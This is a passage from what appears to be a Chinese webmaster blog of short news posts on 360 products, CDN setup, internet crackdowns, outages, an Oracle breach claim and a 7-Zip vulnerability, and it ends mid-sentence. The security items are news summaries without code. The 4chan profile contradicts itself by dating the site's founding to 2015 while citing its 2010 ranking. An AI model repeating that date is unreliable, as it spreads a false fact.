而就在今日下午,广州市市场监管局对另一家违规发布广告的企业UC浏览器违法主体广州聚禾信息科技有限公司作出2091636.59元的处罚。 广州市市场监管局称,当事人于2019年3月16日至2021年3月15日期间,在UC浏览器的“神马搜索”平台为473个广告主发布了608条违法广告,共收取广告费13464.04元。根据《广告法》《医疗广告管理办法》等法律法规,广州市天河区市场监管局依法从严从重从快对涉案当事人作出没收广告费用13464.04元、罚款2078172.55元的行政处罚,罚没金额共计2091636.59元。 #### 360文库低调上线 像是垂死挣扎 今天无意中发现360搜索居然上线了自己的文库品牌-360文库 从官网上看,基本和百度文库差不多,不过360目前显示没有自己上传资料的功能,里面的内容全部来自于新浪的爱问知识平台的。 360搜索已经上线好多年了,可以说是挑战百度失败了,原因是因为内容太少了,百度在有了百度知道、百度文库、百度百科等相关内容知道平台加持下,搜索满意度达到了70%,而360很多内容一直搜不到,360这些年一直想照着百度的产品做内容,不过显然是失败的,上线的360问答、360百科目前来看基本废了。 目前使用360搜索的人越来越少了,主机吧的网站去年还有挺多的从360过来的,今年只有少的可怜,从相关数据表明,360搜索国内占有率低于5%,这已经是边缘化了。 #### 360新推出一个新的AI搜索引擎:纳米搜索 11月27日晚,360集团正式推出全新多模态内容创作引擎——纳米搜索。它以搜索为起点,构建了以“搜学写创”为核心能力的完整工作流,不仅颠覆了传统网页搜索模式,还超越了以Perplexity AI和360AI搜索为代表的答案引擎,被行业解读为搜索引擎3.0,也即“创作引擎”。这标志着搜索从信息检索迈向智能创作的时代。 主机邦测了下,这个所谓的纳米搜索,其实是一个AI问答,当你搜索关键词的时候,首先展示的是第三方网页,然后再生成知识答案,还为用户提供了思维导图。 怎么说呢,相较百度的AI搜索,360对第三方网站更友好一些,起码给你展示,而百度直接拿了网站的内容,连展示都不给展示,可惜360在国内的搜索份额并不高。 目前在AI搜索方面,其实各大搜索引擎都是同一起跑线上的,如果360做得好的话,未必不能打败百度。 纳米搜索用的域名也很厉害,是360花了近一个亿的小目标买的单字母CN域名: n.cn 相当霸气的域名。 #### 360智脑大模型2.0将于6月13日14点发布 6月12日 消息:360官方宣布,360智脑大模型2.0将于6月13日14点正式发布,具备技术优势、搜索增强优势、场景优势、大模型安全优势、数据优势、工程化优势、内容安全优势、算力优势等人工智能研发领域八大优势。 据悉,“360智脑”为360自研千亿参数大语言模型,在此前多项测评中已具备认知智能通用大模型能力。 2023年4月,“360智脑”结合360搜索、智能硬件等优势场景的落地应用已陆续成熟,并开放内测。 5月31日,360智慧生活视觉大模型及 AI 硬件新品发布会在北京举行,发布了360智脑・视觉大模型。 #### 360称全球 APT 组织攻击高度活跃,我国成主要受害国之一,该如何防范 APT 攻击? APT攻击的概念及威胁 高级持续性威胁(APT)是一种网络攻击形式,通常由具有国家背景的黑客组织发起,旨在长期、持续地对特定目标进行攻击。这些攻击通常针对政府、国防军工、金融、能源等领域的重要基础设施和企业,目的是获取敏感信息、破坏系统稳定性或实施其他恶意行为。 全球APT组织活动情况 根据360集团的报告,全球APT组织攻击活动保持高活跃度,全球网络安全厂商以及机构公开发布APT报告累计731篇,报告中涉及APT组织135个,其中属于首次披露的APT组织达到46个。我国是APT攻击活动主要受害国之一,360全年监测到13个境外APT组织针对我国的APT攻击活动1200多起,相关APT组织主要归属北美、南亚、东南亚和东亚地区。 防范APT攻击的技术手段 为了有效防范APT攻击,可以采取以下措施: 使用最新的安全软件:确保安装了最新版本的安全软件,并定期更新,以便能够检测和阻止已知恶意软件和攻击。 更新操作系统和应用程序:及时修补操作系统和应用程序中的安全漏洞,防止攻击者利用这些漏洞进行攻击。 加强网络安全防护:采用防火墙、入侵检测系统(IDS)、安全信息和事件管理(SIEM)等技术手段,提高网络安全防护能力。 定期进行安全评估和漏洞扫描:定期对网络系统进行安全评估和漏洞扫描,及时发现潜在的安全隐患并进行修复。 建立应急响应机制:制定应对APT攻击的应急预案,一旦发生攻击,能够迅速启动应急响应机制,减少损失。 加强人员培训和管理:提高员工的网络安全意识和技能,加强对重要岗位人员的管理和监督,防止内部人员成为攻击者的突破口。 与专业安全团队合作:与专业的网络安全团队合作,共同应对APT攻击,提高防御效果。 请注意,以上措施需要结合实际情况灵活运用,并根据攻击者的特点和动态调整策略。同时,由于APT攻击的特殊性和复杂性,防范APT攻击需要综合考虑多种因素,包括技术、管理、法律等方面。 #### 360站长平台:关闭网站官网认证入口 公告 一、公告事项 360站长平台将于本公告发布之日起15天后关闭官网认证入口。政府组织、公益组织和学校如需申请官网认证,请通过下述入口提交申请。对于其他主体的官网认证,360站长平台正在做认证流程调整,请关注后续公告。 自2020年2月14日起,政府组织、公益组织及学校可通过 http://info.so.com/web_check.html 向360站长平台提交官网认证申请,360站长平台将结合该等主体的社会影响力、网站质量等进行综合考量,对符合条件的网站,给予官网认证,并在用户搜索与主体存在强关联关系的触发词时对通过认证网站进行“官网”标识展现。 二、注意事项 声明:360公司有权对因违反法律法规或不符合360官网认证规则的官网标识进行治理(包括但不限于撤销官方认证标识等操作)。360公司在法律允许最大范围内保留对官网认证规则的最终解释权。 360公司 2020年2月14日 360官网认证是360搜索针对官方网站的特殊展示机制, 通过官网认证审核后,您的网站会显示在寻址需求的前列,并明确标识“官方网站”,有效区分官方网站和其他结果,带来更多点击和品牌曝光。 之前360官网认证一直免费的,这次取消掉后,下次极有可能认证收费了,所以说搜索引擎推广到处都得花钱,以前免费的时代已经一去不复返了…… #### 360网站卫士cdn彻底停运,全面转向奇安信 奇安信网站卫士内部群通知业务更新,要求所有使用360网站卫士的 网站2020-09-01 前更新接入域名的解析记录,转向奇安信,否则停止网站访问! 从360和奇安信分家,奇安信接管360网站卫士后,不仅把原360网站卫士的QQ群更名为奇安信网站卫士,还把原360网站卫士官网域名也给换了,这次又要求更新域名解析记录转向奇安信,看来奇安信和360分家后经过1年多的磨合后,这是准备彻底去360化 以下是内部群通知公告原文: 为了给大家提供更好的安全服务,我司已于2020-06-10 23:00 对DNS系统升级,升级期间不影响网站正常业务,升级后需要您更新接入域名的解析记录。方法如下: NS接入方式操作: 请在域名注册商处将域名的NS解析记录按以下方式修改: ns1.360anyu.com 更新为ns1.qaxanyu.com ns2.360anyu.com 更新为ns2.qaxanyu.com CNAME接入方式操作: CNAME接入的域名后缀 360wzws.com 更新为qaxwzws.com,其他不变。 例如:www.test.com 为CNAME接入方式,需要在域名注册商处将DNS原CNAME值0010742bf4bd0000.360wzws.com修改为0010742bf4bd0000.qaxwzws.com。 请 2020-09-01 前更新您的域名解析记录,否则相关域名将因解析异常导致访问失败。 360网站卫士曾和百度云加速并称国内两大免费CDN,国内市场占有率一度超过百度云加速成为国内第一大免费CDN服务商,不过不知何原因,360对网站卫士投入比较少了,可能是看到了网站的天花板了,毕竟现在是都是APP小程序的时代,而百度云加速和cloudflare合作后,不仅稳定性得到很大的提高,防御能力也变强了许多,而且百度多年来一直在投入,目前已经成为了国内第一大免费CDN服务商,不过随着成本的增加,百度也出了收费版,减少了对免费套餐的支持,估计未来互联网免费的服务会越来越少了。   附上奇安信网站卫士入口:https://wangzhan.qianxin.com/   #### 360网站卫士和百度云加速如何同时使用教学 360网站卫士和百度云加速都是国内两大免费CDN服务商,也是免费网站安全防护服务。不过免费版的毕竟防护能力低,很多站长寻思的是不是可以两个一起用,这样就可以提高防攻击能力。主机吧以前还是小站长的时候就是这么搞过,确实可以得到不错的防护攻击能力,很多站长不会弄,今天主机吧通过教学来实现下,希望可以帮到大家。 一、首先我们进入百度云加速,添加域名,记得采集CNAME接入方式 二、验证通过后添加子域名,然后复制别名地址 三、到域名解析添加解析记录, 记录类型选CNAME,线路类型选默认,记录值填写从百度云加速获取的别名地址 四、 添加完百度云加速解析后,我们再到360网站卫士添加域名,一样选用CNAME 五、一样添加子域名,并复制别名解析地址 六、再到域名解析添加解析记录,添加CNAME记录,线路选电信或者联通都可以。   添加完记录后,等360网站卫士验证通过即可完成360网站卫士与百度云加速同时使用。用户通过电信和联通访问分别访问百度云加速与360网站卫士,受到攻击也是一样的,两个防护服务分别承受来自不同线路的攻击,从而实现增加防护能力。   #### 360网站卫士推出收费版 中小站长新选择 要说国内免费高防CDN比较出名的就属360网站卫士和百度云加速了,前者是由360安全公司推出的专为网站加速防护的产品,而后者是百度推出的专为网站加速防护的产品。360网站站卫士推出的比百度早,很早之前就是市场占有率第一的免费高防CDN产品,后来不知怎么的360一直没怎么更新过,防护也不理想,节点也比较少,而百度后来居上,与国际知名高防CDN服务商CloudFlare合作后,防护能力得到很大的提升,而且国内节点也很多,更有百度搜索引擎照顾,慢慢的追上360网站卫士,如今百度云加速收费版已经成为了国内中小站长防护必备产品。而360之前一直都是打着永久免费防护,将免费尽行到底。但是我们要知道天下没有免费的午餐,再好的产品没有收入,也会慢慢消失。这不360也开始推出了收费版本,价格相对于阿里云腾讯云这些要便宜很多,不过相比百度云加速要贵,防护配置方面也不如百度云加速,但有一点倒是比百度云加速好,支持多个端口加速,这个是百度没有的。如果百度用不了可以尝试用360网站卫士,应该是不错的,毕竟360怎么说也是安全公司出身,对于网站防护还 是有一套的。 #### 360花了一个亿买下的n.cn域名 打算做360AI搜索 今日,360公司创始人周鸿祎在微博上宣布,360计划在本月发布一款全新产品,并邀请网友为其命名。 周鸿祎表示,目前公司已有一款名为 “360AI搜索” 的产品,该产品在 PC 端的用户访问量上是国内最大的原生 AI 应用,反映出搜索是普通用户使用 AI 的最佳场景之一。这次希望在360AI搜索的基础上,再次颠覆自我,也颠覆搜索,做出一个人人都能用的AI应用。 周鸿祎提到,重新命名的原因在于,尽管 “360” 这个品牌在消费者心中与安全联系紧密,但他希望新产品能够体现 AI 的概念。因此,他希望为新产品找到一个以字母 “N” 开头的名称,原因是他几年前购买了一个以 “N” 开头的域名,并希望能够利用起来。周鸿祎还表示,如果网友的命名建议被采纳,将会邀请这位网友在发布会上担任重要角色,以感谢他们的贡献。 在谈到 AI 搜索时,周鸿祎强调了这一领域的重要性。他指出,传统搜索引擎存在很多问题,而 AI 搜索的出现可以为用户带来更好的体验和便捷的使用方式。他还提到,AI 产品的普及性和适用性是非常关键的,希望新产品能够让更多人享受到 AI 技术带来的便利。 周鸿祎还分享了他在雅虎工作时的经验,提到当时他主张使用不同品牌来区分不同业务,虽然在内部引发了一些争论,但最终证明了这一决定是正确的。如今,随着市场的变化,他意识到品牌的创新与发展是必要的,特别是在 AI 这个快速发展的领域。 #### 3月19日起全国扫黄打非办开始啦:将加大整治低俗、“软色情”弹窗广告及淫秽色情网站 3月19日 消息:据“扫黄打非”消息,即日起至 11 月底开展“新风2021”集中行动,重点整治五个领域。其中包括网络直播、网络游戏、网络文学、网络社交专项整治。 其中国包括开展弹窗广告专项整治,加大对低俗、“软色情”弹窗广告的处罚力度,追查淫秽色情网站等非法弹窗广告源头。 以下为“净网”行动重点整治五个领域。 一是继续开展网络直播专项整治,深入整治直播打赏乱象,严禁炒作 “天价打赏”行为,重点关注 “美女直播”“热舞”“主播 PK”等问题多发版块,处置低俗直播诱导打赏行为;坚决打击非法地下直播平台。 二是开展网络游戏专项整治,严厉打击传播淫秽色情、暴力血腥等有害内容的网络游戏,严肃处置人物衣着暴露、以打 “擦边球”为噱头的网络游戏,着力查处未经批准擅自运营的网络游戏,禁止直播未经审批的网络游戏。 三是开展网络文学专项整治,组织抽样检查,严肃处理导向不正确、内容低俗的作品,坚决打击制售传播淫秽色情内容行为,从严查处线下非法出版、印制、销售网络文学作品活动。 四是开展弹窗广告专项整治,加大对低俗、“软色情”弹窗广告的处罚力度,追查淫秽色情网站等非法弹窗广告源头。五是开展网络社交平台专项整治,重点打击通过群组传播有害信息行为。 #### 3月起全国扫黄打非办部署开展“净网2019”等专项行动 2月27日 消息:今日,扫黄打非办发文称,将于 3 月- 11 月组织开展“净网2019”“护苗2019”“秋风2019”等专项行动。 “净网2019”专项行动,将聚焦整治网络色情和低俗问题,通过强化司法打击、行政管理、行业规范、道德约束等多种手段综合施策,综合治理。着重整治网络文学领域,严查淫秽视频打赏平台,严厉打击非法网络直播平台,严惩通过直播平台传播淫秽物品、组织淫秽表演的犯罪分子,坚决关停违法直播及聚合软件。 “护苗2019”专项行动,将强化中小学周边文化环境整治,重点查处无证销售出版物和销售非法出版物的违法行为,大力查缴有损未成年人身心健康的不良出版物、“口袋本”图书、卡通漫画、游戏卡片、色情低俗视频等有害信息。强化对未成年人接触较多的互联网应用的整治,特别对网络短视频、游戏、漫画、学习类APP等领域加强清理。 “秋风2019”专项行动,重点打击假媒体假记者站假记者及新闻敲诈行为,切实维护新闻出版传播秩序。 今日早些时候,扫黄打非办发文公布了今年前两个月“扫黄打非”工作情况,据统计,全国共查办“扫黄打非”案件 1000 多起,收缴各类非法出版物 150 余万件,对网络文学、学习类APP、音乐平台等领域传播色情低俗信息等 200 多件重点线索进行核处,对百度等多个知名网站作出处罚,全国共清理、下架违法违规学习类APP1. 5 万余个。 #### 4chan价值上亿美元的网站,背后居然都只有一个程序员 一个程序员,能顶一个连你一定用过Google吧?有没有觉得这个页面极其简单,仿佛一个程序员就可以做出来?然而事实并非如此,这个页面背后有个名叫Google Web Servers的服务,有着上百人维护。不仅如此,有来自上百国家或地区不同宗教和民族的员工和用户来讨论这个互联网的门户应该长什么样,远不是一个程序员能够胜任的。但是也请不要忽视一个程序员的力量:因为在互联网上,确实有不少高流量、颇为成功的网站,反而从一开始就是一个人运营的……今天,我们就来认识几个。01 4chan-互联网上的“垃圾桶”4chan在爱好和口味上对于当下美国很大一部分年轻(男性)的影响力是有目共睹的。令很多人感到惊讶的是,这个已经成为互联网上最大垃圾桶的网站,最一开始其实只是个无辜的二次元论坛而已。克里斯托弗·普尔(Christopher Poole)是个漫画迷,因为对经常上的论坛感到不满,想要自己做个网站。2015 年,年仅 15 岁的普尔找来了日本著名二次元论坛2ch(Futaba Channel双叶论坛)的源代码,将其翻译成英文,上线了一个新的网站,命名为4chan(四叶论坛)。4chan不断发展壮大,在创立后的几年时间里增加了许许多多非动漫的版块,比如电子游戏、枪支、汽车、体育,甚至许多成人版块……这些版块和内容,也让4chan刺破了二次元和现实世界之间的隔膜,吸引到了更多非宅用户,但网站总体上还是比较宅的。为了帮助你更好理解这个网站,目前的4chan基本上是一个英文版的S1+铁血+天涯+草榴……从创始直到 2015 年,4chan的主要运营者就只有普尔一人而已,但其Alexa排名不断进步,从 2010 年的 700 左右爬升到了今天的全球第 383 名(美国 148 名)——对于一个总体上比较宅的网站来讲,可以说是相当优秀的成绩了。2015 年,普尔将4chan卖给了模仿对象2ch的创始人西村博之。4chan是一个神奇的存在,因为在这个论坛上,在意识形态和政治光谱上相去甚远的两个版块可以同时存在。4chan用户可以在一个子版里严肃探讨LGBT在社会中的存在现状,也可以在另一个子版里大骂别的用户是faggot(对同性恋者的侮辱词汇)。如果你进错了版,就不要怪别人很黄很暴力了。一个典型的4chan帖子截图:也正因为4chan在相当长一段时间里只有Moot(普尔在4chan上的网名)一个人看管,网站很大程度上要依靠志愿者版主来辅助维护。而Moot通常不会对这些版主的意识形态横加干涉,造就了一个可以同时存在于阵营九宫格上任何位置的4chan……一个最经典的例子就是4chan的政治版块/pol/。这是一个在政治光谱上严重偏右的版块,上面挤满了各种谣言、阴谋论和Pepe青蛙梗。前面提到,4chan对美国年轻男性的影响很大,主要是因为在这个网站上的用户画像就是所谓的“沉默的大多数”,也即那些在过去自由派的语境下无法发声的,拥有投票权的美国人。而特朗普的上任鼓励了这些人发声,他甚至公开谈论那些在4chan里出现过的阴谋论——一种赤裸裸的狗哨政治行为。比如在4chan里诞生的QAnon运动,也进入了特朗普的竞选集会。很难想象,4chan这个最初只有一个人运营的二次元网站,能对美国最高行政长官和美国政治生态产生如此之大的影响。至今4chan都对营利不太感冒,只靠广告和捐助赚一点点钱,一些评级网站还是认为,如果全面商业化,4chan的价值将达到七亿美元。来源:硅星人(guixingren123) #### 4个色情淫秽网站被捣毁“福利姬”被刑拘! 近日,浙江省丽水市莲都区公安分局网络安全保卫大队在日常工作中发现, 一个名为“夜撸社”的网站存在大量yi秽信息,遂组织警力对该网站展开调查。 网警在对该网站进行调查分析的过程中,发现该网站内共有yi秽色情类视频帖一万余条, 注册会员一万五千余人。进一步调查发现,成为该网站会员需购买售价58元的******, 按会员人数推算,该网站仅“门票”就非法获利近百万元。 四个yi秽色情网站被捣毁   除了上面提到的“夜撸社”外,网警通过其网站友情链接 又发现了两个yi秽色情网站,分别是“淘拍铺”与“91m1” 其中“淘拍铺”网站拥有会员3400余人,“91m1”网站则有会员2200余人。   通过网安部门的进一步侦查核实,确认这3个网站的实际控制人为 福建某县的张某城夫妇、张某川夫妇、张某杰夫妇,而这6人为同村的宗族亲戚。   在福建公安机关的配合下,浙江公安机关将6名犯罪嫌疑人抓获归案, 当场从6名嫌疑人的手机、电脑等电子设备中查获大量的yi秽色情视频 及网站后台操作记录。在事实证据面前,6名犯罪嫌疑人对架设网站 贩****秽视频牟利的犯罪行为供认不讳。   今年4月,莲都民警又发现一个名叫“新司机”的yi秽色情网站, 注册会员多达百万,且组织架构相比“夜撸门”系列网站更为严密。   莲都警方于7月24日在山东、江苏摧毁该网站,抓获犯罪嫌疑人4人,查获数万部yi秽视频。 经查,犯罪嫌疑人赵某伙同李某某等人,非法运营“新司机”网站 注册会员一百多万,非法获利800余万元。   九名:“福利姬”被刑拘 打掉几个yi秽色情网站后,办案民警又组织警力对yi秽视频的来源进行追踪, 发现了一批专门靠传播yi秽物品牟利的“福利姬”线索。所谓“福利姬”, 是指通过互联网售卖自己的大尺度照片和视频,以此赚取钱财的女孩。 办案人员从张某城团伙处打开突破口,掌握了9名“福利姬”的身份信息以及违法犯罪证据。     4月到5月,莲都警方派出工作组在全国各地统一收网,9名“福利姬”落网。 警方在嫌疑人住处搜出大量拍摄视频所使用的道具及出售yi秽视频图片。 在证据面前,所有嫌疑人均对其违法犯罪行为供认不讳,目前已全部被刑事拘留。 据其中一名嫌疑人交代,她从事“福利姬”两年时间获利200余万元。 PS:所以大家不要做违反国家法律的东西,天网恢恢,疏而不漏! 本文转载于网络截图 素材来源于: | 浙江网警 #### 50余名艺人有偿删帖 公安部打击网络水军 9月9日 消息:据公安部消息,昨日,公安部新闻发布会在京召开,针对“网络水军”的相关提问,公安部表示,近年来,自媒体、短视频和直播平台快速兴起,随之而来,出现了造谣引流、舆情敲诈、刷量控评、有偿删帖等各类“网络水军”违法犯罪活动。常见的“网络水军”违法犯罪活动涉及利用信息网络实施的寻衅滋事、敲诈勒索、非法经营等。 公安部称,对此高度重视,组织开展打击整治“网络水军”专项工作,今年已累计侦办相关案件339起,超过历年的全年侦办案件总数。下面结合打击情况,简要介绍“网络水军”突出表现形式。 一是“网络水军”造谣引流违法犯罪。一些不法分子为吸引流量,赚取平台奖励,利用各类网络热点收割流量,有的为吸引眼球发布虚假信息甚至恶性谣言。如,重庆网民周某为制造热点吸引流量,录制发布视频,谎称自己系新冠病毒患者并发布不当言论,引发网民大量转发,严重扰乱疫情防控管理秩序,被依法刑事拘留。 二是“网络水军”舆情敲诈违法犯罪。一些不法分子开办假冒媒体网站和自媒体账号,以撰写、炒作负面信息相要挟实施敲诈勒索。如,广东公安机关打掉一个专门撰写发布装修公司负面信息并实施敲诈勒索的“网络水军”犯罪团伙,抓获14名犯罪嫌疑人,查明该团伙在网上发布全国各地50余家装修公司的负面信息,非法牟利50余万元。 三是“网络水军”刷量控评违法犯罪。当前,一些企业、个人盲目追求对其商品和信息的正面内容及转发、点赞数量等流量指标,寻求有偿刷量炒作服务,滋生有偿刷量控评乱象。如,山东公安机关摧毁一个“网络水军”流量造假产业链,打掉相关“网络水军”团伙25个,抓获犯罪嫌疑人81名,扣押作案手机3000余部,查获操控虚假流量的网络平台68个、网络账号20余万个,涉案金额2000余万元。 四是“网络水军”有偿删帖违法犯罪。一些不法分子为牟取非法利益长期提供有偿删除、屏蔽网上负面信息服务,涉及食品、医疗、文娱、电商等多个行业领域,侵犯群众知情权,破坏市场经济秩序。如,江苏公安机关打掉一个“网络水军”有偿删帖团伙,抓获犯罪嫌疑人25名,查获涉案合同800余份,查明该团伙为30余家企业和50余名明星艺人提供有偿删帖服务,涉案金额2000余万元。 公安部称,下一步将聚焦“网络水军”突出问题,按照“以打开路、以打促治”的思路,依法严厉对“网络水军”违法犯罪活动持续实施集群打击,全力挤压“网络水军”违法犯罪活动空间,切实维护网络公共秩序。 #### 5118:一家不错的SEO查询网站 由于爱站挂了,导致一些习惯进爱站查询信息的站长变得不习惯了,其实相比爱站,国内专业的SEO查询工具还是有的,比如站长之家,比如5118,今天主机吧就是推荐5118的。 跟爱站的免费不同,5118很多功能是收费的,但是在主机吧看来还是非常值的。 5118可以实现网站监控、关键词挖掘、外链查询、关键词排名查询、竞争对手查询等,总之比爱站专业得多,不过大多数功能还是收费的。 主机吧自己也用5118监控自己的博客,效果还是不错的,可以随时知道自己网站的收录量、排名、权重等。 如果你也是搞SEO的,可以尝试使用看看,官网地址:www.5118.com   #### 51啦免费统计免费好用的网站统计工具 近几个月对站长来说,最不友好的消息就是统计工具收费了,CNZZ统计目前只接入收费的网站了,而百度统计也开始改版了,很多功能不能用了,要用收费版的分析云才有,这也是一种变相的收费了。 不过,好在国内还是有替代的统计工具的,比如51啦统计,目前主机吧就是用这个统计工具,很好用,而且是免费的。 美中不足的是,无法精准的统计搜索关键词。 总得来说,还是非常值得推荐的,有需要的同学可以试试。 地址:https://v6.51.la/ #### 56个免费可商用字体分享,再也不用担心字体侵权啦 前一阵子,有小伙伴在交流群里说自己因为用了微软雅黑,收到了字体侵权的通知函,没想到中弹的小伙伴还不止一个……坑爹有木有 What? 使用微软雅黑字体,被告侵权??! 没错!就是你电脑中系统自带的字体“微软雅黑”,这个字体用于商业用途的版权其实是归属于方正公司的。 谁能想到,这样竟然就踩到了版权的“法律红线”,心疼收到通知函要花大工夫替换字体的运营喵和设计狮们…… 那么问题来了,到底有哪些字体是可以免费商用,不用担心侵权危险的呢? 所以,我为大家准备了 56 个免费可商用的字体,赶紧领取福利吧~ 思源黑体 淘宝可用华康体   文泉驿黑体 其他字体   【资料免费领取地址】 链接: https://pan.baidu.com/s/1hujEHPM 密码: gewn #### 58同城顶不住了,被曝大裁员! 职场社交平台“脉脉”上有部分认证为58同城员工的网友透露公司近期发生了裁员。 有网友表示,自己所在的teg部门裁员比例为30%。还有网友称,自己所在的部门裁员比例达50%。 来源:脉脉,下同 也有网友表示,“确实公司没说裁员,说的是协商解除劳动合同”。 58同城是中国领先的分类信息网站,成立于2005年。它提供了一个庞大的本地信息服务平台,帮助用户查找各种分类下的二手物品、租房、招聘、求职、生活服务、教育培训等信息。58同城为用户提供便捷的信息发布和查看功能,同时也为商家提供了一个在线展示和推广产品的平台。 #### 600 万条数据被黑客叫卖,甲骨文坚称未遭入侵 3 月 22 日消息,科技媒体 bleepingcomputer 昨日(3 月 21 日)发布博文,报道称一名黑客声称从甲骨文(Oracle)的云服务中窃取了 600 万条数据,并试图在黑客论坛上出售。不过甲骨文公司坚决否认其云服务遭受了任何形式的入侵,并表示泄露的凭证与甲骨文云无关,客户数据也未受影响。 一名自称“rose87168”的黑客昨日发布了多个文本文件,其中包括数据库样本、LDAP 信息以及声称从甲骨文云 SSO 平台窃取的公司名单。 rose87168 正在 BreachForums 黑客论坛上出售据称窃取的数据,价格未公开,或要求以零日漏洞作为交换。如下: 泄露的数据包括加密的 SSO 密码、Java Keystore(JKS)文件、密钥文件以及企业管理器 JPS 密钥。黑客声称这些数据是通过入侵甲骨文云的 SSO 服务器获取的。 为证明其访问权限,黑客还提供了一个 Internet Archive 链接,显示他们在甲骨文服务器上上传了一个包含其 ProtonMail 邮箱地址的文本文件。 rose87168 声称,他们在约 40 天前获得了甲骨文云服务器的访问权限,并从 US2 和 EM2 云区域窃取了数据。 黑客试图通过电子邮件向甲骨文勒索 10 万 XMR(门罗币),以换取入侵服务器的详细信息,但甲骨文公司拒绝了这一要求,并要求提供所有修复和补丁所需的信息。 黑客表示,所有甲骨文云服务器均使用了一个存在公开 CVE(漏洞)的版本,但目前尚无公开的 PoC(概念验证)或利用代码。该媒体无法独立验证这一说法的真实性。 甲骨文向 BleepingComputer 表示:“甲骨文云并未遭受入侵。发布的凭证与甲骨文云无关。没有甲骨文云客户的数据泄露或丢失。” #### 6月15日美国发生大规模 DDoS 攻击:AT&T、Twitter、Netflix、谷歌等 30 家遭殃 美国的众多在线和电信服务近日突然出现大范围故障,一些人由此认为这归因于一次精心协调的攻击。 6月15日众多人反映美国的许多不同服务出现故障,这表明美国可能正遇到精心协调的DDoS即“分布式拒绝服务”攻击。这种攻击是恶意活动,通过向目标服务器发送来自多个源头的庞大流量、让服务器不堪重负,企图破坏或关闭目标服务器。 据故障检测网站Downdetector声称,用户报告众多企业组织出现故障,包括:主要的移动运营商(T-Mobile、Metro、Verizon、AT&T、Sprint、Consumer Cellular和US Cellular),互联网提供商(Spectrum、Comcast、CenturyLink和Cox),社交媒体平台(Facebook、Instagram、Snapchat和Twitter),游戏及游戏服务(《Fortnite》、《Roblox》、《Call of Duty》、Steam、Xbox Live和Playstation Network),流媒体服务(Netflix、Hulu、HBO Now和Twitch),银行(大通银行和美国银行),送餐服务(Doordash),以及其他主要平台(比如谷歌和Zoom)。 不过,这些攻击的潜在源头仍然不得而知。人气颇高的“匿名者”Twitter帐户@YourAnonCentral推测它“源头可能是。。” 同一个Twitter帐户引用了Digital Attack Map(数字攻击地图),该地图跟踪“全球最主要的日常DDOS攻击”,直观地显示了这些攻击。但是网络安全专家Marcus Hutchins等一些人声称,该地图“绘制得很糟糕”,目前无法“表明是针对美国的攻击”。 各大运营商在Downdetector上都赫然在列,不过Verizon声称有人误报了T-Mobile的问题。 Verizon发言人称:“Verizon的网络运行良好。我们知道另一家运营商出现了网络问题。进出该运营商的电话呼叫可能收到出错消息。我们知道,Downdetector误报了Verizon网络问题。” T-Mobile的首席执行官Neville Ray一直在提供这方面的最新信息,不过离他发布帖子已过去四个小时,这家公司仍在竭力为所有用户解决问题。 据AT&T媒体沟通部门声称,其网络“运行正常”,提到了这种可能性:用户尝试连接至“其他运营商的网络”时,可能会出现问题。 目前还没有黑客组织声称对这个事件负责。 这并不是第一次出现大规模的DDOS攻击,美国断网的事件。 2016全球首次大规模物联网攻击,导致美国东海岸大面积断网,严重影响当地人民生活秩序和社会稳定,这是由三位大学生所编写的Mirai源代码及运营僵尸网络,造成严重后果,在2016年10月,险些搞砸美国大选! 当时Mirai大规模爆发,黑客发起对美国互联网域名解析服务商DYN的DDOS攻击,攻击当天,美国东海岸大面积断网,导致Twitter、亚马逊、华尔街日报等数百个重要网站无法访问,美国主要公共服务、社交平台、民众网络服务瘫痪。 这次灾难被称为“美国东海岸断网”事件,仅DYN一家公司的直接损失就超过了1.1亿美元,事件的整体损失不小。 #### 6月27日阿里云出现大范围故障 各大网站均打不开 下午 16:30 左右,微信朋友圈、微信群、微博出现阿里云故障消息,故障原因主要体现在阿里云官网、控制台无法访问,尝试登陆阿里云官网,显示如下: 官网有时候可以访问,有时候显示502错误的网关,即使官网可以访时,点击登陆,页面只会刷新,登陆不了。 官网公告称16:21左右开始,阿里云官网的部分管控功能,及MQ、NAS、OSS等产品的部分功能出现故障,以下为全文: 阿里云官网通告:6月27日阿里云部分产品及账号登录访问异常通告 【阿里云】【网络】【异常通告】 异常时间:北京时间2018年6月27日16:21左右。 异常概述:于北京时间2018年6月27日16:21左右开始,阿里云官网的部分管控功能,及MQ、NAS、OSS等产品的部分功能出现访问异常,阿里云工程师正在紧急处理中,请您稍后重试。 【异常更新】 北京时间2018年6月27日 16:50 目前受影响的业务正在逐步恢复中,若遇到异常,请您稍等后重试。 【异常更新】 北京时间2018年6月27日 17:30 目前受影响的业务大部分已经恢复正常,请您确认。若还有异常,请您跟我们反馈,谢谢。 故障时间 50 分钟左右,故障原因,阿里云尚未披露。 以下为用户吐糟: 网友吐糟:毕竟是自主研发的云,当然有点小脾气 #### 7-Zip 压缩工具被曝高危漏洞,可绕过微软 Win10 / Win11 MoTW 用于传播恶意软件 1 月 22 日消息,科技媒体 bleepingcomputer 昨日(1 月 21 日)发布博文,报道称压缩工具 7-Zip 被曝出一个高危漏洞(CVE-2025-0411),推荐用户尽快升级到 2024 年 11 月 30 日发布的 24.09 版本。 攻击者可以利用该漏洞,绕过 Windows 的“网络标记”(Mark of the Web,简称 MotW)安全功能,在用户从嵌套压缩包中解压恶意文件时执行恶意代码。 自 2022 年 6 月 22.00 版本起,7-Zip 开始支持 MotW,会自动为从下载的压缩包中提取的所有文件添加 MotW 标记(特殊的“Zone.Id”备用数据流)。 该标记会告知操作系统、Web 浏览器和其他应用程序,这些文件可能来自不受信任的来源,应谨慎处理。通常情况下,双击带有 MotW 标记的可执行文件或打开文档时,用户会收到安全警告,Microsoft Office 也会以“保护视图”打开文档,禁用宏等功能。 该漏洞主要是因为 7-Zip 在处理含 MotW 标记的压缩包时,未能将 MotW 标记沿用到提取的文件,导致解压过程留下可乘之机,可以执行任意代码。 Trend Micro 的报告指出,该漏洞需要用户交互才能被利用,例如访问恶意网页或打开恶意文件。攻击者可以制作带有 MotW 标记的特殊压缩包,其中包含嵌套的恶意文件。 当用户使用存在漏洞的 7-Zip 版本解压该压缩包时,由于 MotW 标记未被正确传播,恶意文件将绕过安全警告直接执行。 7-Zip 开发者 Igor Pavlov 已于 2024 年 11 月 30 日发布了 24.09 版本,修复了该漏洞。然而,由于 7-Zip 没有自动更新功能,许多用户可能仍在运行易受攻击的版本,面临被恶意软件感染的风险。类似的 MotW 绕过漏洞曾被 DarkGate 和 Water Hydra 等黑客组织利用,传播恶意软件。 7-Zip 是一款由俄罗斯程序员 Igor Pavlov 开发的开源压缩工具,最初发布于 1999 